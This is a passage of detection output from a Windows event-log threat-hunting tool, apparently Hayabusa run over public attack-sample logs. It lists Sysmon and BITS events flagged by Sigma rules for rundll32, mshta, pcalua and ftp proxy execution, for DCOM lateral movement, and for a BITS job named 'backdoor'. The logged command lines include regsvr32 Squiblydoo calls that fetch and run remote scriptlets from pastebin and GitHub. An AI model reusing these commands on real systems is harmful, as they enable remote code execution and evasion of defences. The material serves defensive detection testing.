365ABB72-20C7-5CD8-0000-001021022500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:59.743 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 
Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:37:49.604 +09:00,IEWIN7,11,info,,File Created,Path: C:\ProgramData\calc.hta | Process: C:\Windows\Explorer.EXE | PID: 2940 | PGUID: 365ABB72-15B9-5CD8-0000-00103CEB0600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.523 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 3856 | PGUID: 365ABB72-21B8-5CD8-0000-0010BADE2600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.523 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta | LID: 0x13a10 | PID: 2964 | PGUID: 365ABB72-21B8-5CD8-0000-0010E4E82600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious 
Execution 01,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:01.383 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" | LID: 0x13a10 | PID: 704 | PGUID: 365ABB72-21B9-5CD8-0000-0010FC002700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:55:56.626 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 684 | PGUID: 365ABB72-25EC-5CD8-0000-0010CB0A1000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:56:12.329 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\shdocvw.url | Process: c:\python27\python.exe | PID: 684 | PGUID: 
365ABB72-25EC-5CD8-0000-0010CB0A1000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:56:12.652 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe | LID: 0x1364c | PID: 2168 | PGUID: 365ABB72-25FC-5CD8-0000-0010906A1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:56:12.652 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:56:46.573 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\inf\WmiApRpl\0009\WmiApRpl.ini | Process: \\?\C:\Windows\system32\wbem\WMIADAP.EXE | PID: 1512 | PGUID: 365ABB72-2615-5CD8-0000-001075171500,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:56:46.605 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\PerfStringBackup.INI | Process: \\?\C:\Windows\system32\wbem\WMIADAP.EXE | PID: 1512 | PGUID: 365ABB72-2615-5CD8-0000-001075171500,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:57:39.662 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MpIdleTask | Process: C:\Windows\system32\svchost.exe | 
PID: 968 | PGUID: 365ABB72-2522-5CD8-0000-001080D10000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:58:39.850 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 1256 | PGUID: 365ABB72-268F-5CD8-0000-0010F4A51700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 22:58:54.897 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe | LID: 0x1364c | PID: 2728 | PGUID: 365ABB72-269E-5CD8-0000-001084F81A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 22:58:54.897 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 23:18:03.589 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1364c | PID: 3320 | PGUID: 365ABB72-2B1B-5CD8-0000-0010CCC92500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx 
+2019-05-12 23:18:09.589 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 816 | PGUID: 365ABB72-2B21-5CD8-0000-001039DD2500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-12 23:18:09.589 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-13 02:01:43.391 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135f2 | PID: 3788 | PGUID: 365ABB72-516B-5CD8-0000-001087E41600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:01:50.781 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe | Process: C:\Windows\System32\pcalua.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 2952 | PGUID: 365ABB72-517E-5CD8-0000-001024D61700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:01:51.007 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe | LID: 0x135f2 | PID: 2920 | PGUID: 
365ABB72-517E-5CD8-0000-00105FE01700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:01:51.007 +09:00,IEWIN7,1,low,Evas,Indirect Command Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:09:02.275 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 1528 | PGUID: 365ABB72-532E-5CD8-0000-00106C222700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Evas,Code Execution via Pcwutl.dll,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_pcwutl.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-13 02:20:01.980 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135f2 | PID: 4092 | PGUID: 365ABB72-55C1-5CD8-0000-0010970D2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:31.183 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u 
execute -i 11 -p c:\Windows\system32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 956 | PGUID: 365ABB72-55DF-5CD8-0000-001018532F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:49.443 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\ftp.exe"" -s:c:\users\ieuser\appdata\local\temp\ftp.txt | LID: 0x135f2 | PID: 2392 | PGUID: 365ABB72-55F1-5CD8-0000-0010781C3300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:49.443 +09:00,IEWIN7,1,medium,Exec | Evas,Suspicious ftp.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_ftp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:49.458 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\system32\calc.exe | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe | LID: 0x135f2 | PID: 684 | PGUID: 365ABB72-55F1-5CD8-0000-00103D1E3300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 03:04:50.121 +09:00,IEWIN7,59,info,Evas | Persis,Bits Job Created,Job Title: backdoor | URL: C:\Windows\system32\cmd.exe,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx +2019-05-13 03:35:05.155 +09:00,IEWIN7,1,info,,Process Created,"Cmd: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA 
scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13eee | PID: 1420 | PGUID: 365ABB72-6759-5CD8-0000-0010E2D50F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:05.780 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll | LID: 0x13eee | PID: 1912 | PGUID: 365ABB72-6759-5CD8-0000-001085031000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:06.562 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49165 (IEWIN7..home) | Dst: 104.20.208.21:80 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 1420 | PGUID: 365ABB72-6759-5CD8-0000-0010E2D50F00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:06.562 +09:00,IEWIN7,3,high,Exec | Evas,Regsvr32 Network Activity,,../hayabusa-rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 
03:48:52.219 +09:00,IEWIN7,1,info,,Process Created,"Cmd: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll | Process: C:\ProgramData\jabber.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13715 | PID: 1340 | PGUID: 365ABB72-6A94-5CD8-0000-00101BDB0E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx +2019-05-13 03:48:52.766 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll | LID: 0x13715 | PID: 3880 | PGUID: 365ABB72-6A94-5CD8-0000-0010C2F10E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx +2019-05-13 23:50:59.389 +09:00,IEWIN7,59,info,Evas | Persis,Bits Job Created,Job Title: hola | URL: C:\Windows\system32\cmd.exe,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx +2019-05-14 03:02:49.160 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\mobsync.exe -Embedding | Process: C:\Windows\System32\mobsync.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1341d | PID: 3828 | PGUID: 365ABB72-B147-5CD9-0000-00109D4F0B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,info,,Process Created,Cmd: /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x133de | PID: 2372 | PGUID: 
365ABB72-B167-5CD9-0000-0010EE150C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,info,,Process Created,Cmd: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x1341d | PID: 2476 | PGUID: 365ABB72-B167-5CD9-0000-001062160C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.895 +09:00,IEWIN7,1,info,,Process Created,Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: /c notepad.exe | LID: 0x133de | PID: 2584 | PGUID: 365ABB72-B167-5CD9-0000-00109D240C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:21.212 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49159 (IEWIN7) | Dst: 151.101.128.133:443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 2476 | PGUID: 
365ABB72-B167-5CD9-0000-001062160C00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:21.212 +09:00,IEWIN7,3,high,Exec | Evas,Regsvr32 Network Activity,,../hayabusa-rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:05:18.692 +09:00,IEWIN7,1,info,,Process Created,Cmd: wmiadap.exe /F /T /R | Process: C:\Windows\System32\wbem\WMIADAP.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 1188 | PGUID: 365ABB72-B1DE-5CD9-0000-0010715B0D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 09:29:52.744 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:58172 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx +2019-05-14 09:32:22.775 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:55099 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx +2019-05-14 09:32:36.775 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:55101 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 
365ABB72-0BAC-5CDA-0000-0010C5940300,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\mshta.exe -Embedding | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1070ce | PID: 1932 | PGUID: 365ABB72-19E0-5CDA-0000-001006711000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Evas,MSHTA Spwaned by SVCHOST,,../hayabusa-rules/sigma/process_creation/proc_creation_win_lethalhta.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:05.534 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49168 (IEWIN7) | Dst: 10.0.2.17:55683 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 1932 | PGUID: 365ABB72-19E0-5CDA-0000-001006711000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: 
